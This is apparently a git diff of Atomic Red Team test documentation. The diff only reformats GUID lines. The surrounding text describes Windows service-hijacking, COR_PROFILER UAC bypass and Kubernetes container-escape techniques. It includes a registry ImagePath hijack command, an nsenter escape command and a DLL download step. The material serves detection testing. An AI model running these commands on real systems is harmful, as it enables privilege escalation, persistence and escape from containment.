## Atomic Test #1 - Execution of program.exe as service with unquoted service path - -auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 2770dea7-c50f-457b-84c4-c40a47460d9f + + + #### Inputs: diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index 18600716..821ed917 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -16,14 +16,16 @@ Adversaries may also alter Registry keys associated with service failure paramet
## Atomic Test #1 - Service Registry Permissions Weakness - -auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + **Supported Platforms:** Windows +**auto_generated_guid:** f7536d63-7fd4-466f-89da-7e48d550752a + + + #### Inputs: @@ -49,13 +51,15 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
## Atomic Test #2 - Service ImagePath Change with reg.exe - -auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - Change Service registry ImagePath of a bengin service to a malicious file + **Supported Platforms:** Windows +**auto_generated_guid:** f38e9eea-e1d7-4ba6-b716-584791963827 + + + #### Inputs: diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md index 958aac95..693d673f 100644 --- a/atomics/T1574.012/T1574.012.md +++ b/atomics/T1574.012/T1574.012.md @@ -18,9 +18,6 @@ Adversaries may abuse COR_PROFILER to establish persistence that executes a mali
## Atomic Test #1 - User scope COR_PROFILER - -auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. @@ -28,9 +25,14 @@ If the account used is not a local administrator the profiler DLL will still exe the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + + + #### Inputs: @@ -82,18 +84,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - System Scope COR_PROFILER - -auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** f373b482-48c8-4ce4-85ed-d40c8b3f7310 + + + #### Inputs: @@ -141,15 +145,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Registry-free process scope COR_PROFILER - -auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 79d57242-bbef-41db-b301-9d01d9f6e817 + + + #### Inputs: diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index 292c6f39..e3aaf7bd 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -12,13 +12,15 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
## Atomic Test #1 - ExecIntoContainer - -auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b - Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b + + + #### Inputs: diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md index c1e1dbd6..6b91bb16 100644 --- a/atomics/T1610/T1610.md +++ b/atomics/T1610/T1610.md @@ -12,17 +12,19 @@ Containers can be deployed by various means, such as via Docker's create ## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 58004e22-022c-4c51-b4a8-2b85ac5c596b - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 58004e22-022c-4c51-b4a8-2b85ac5c596b + + + diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index b39e3b53..910e11e7 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -12,17 +12,19 @@ There are multiple ways an adversary may escape to a host environment. Examples
## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff + + +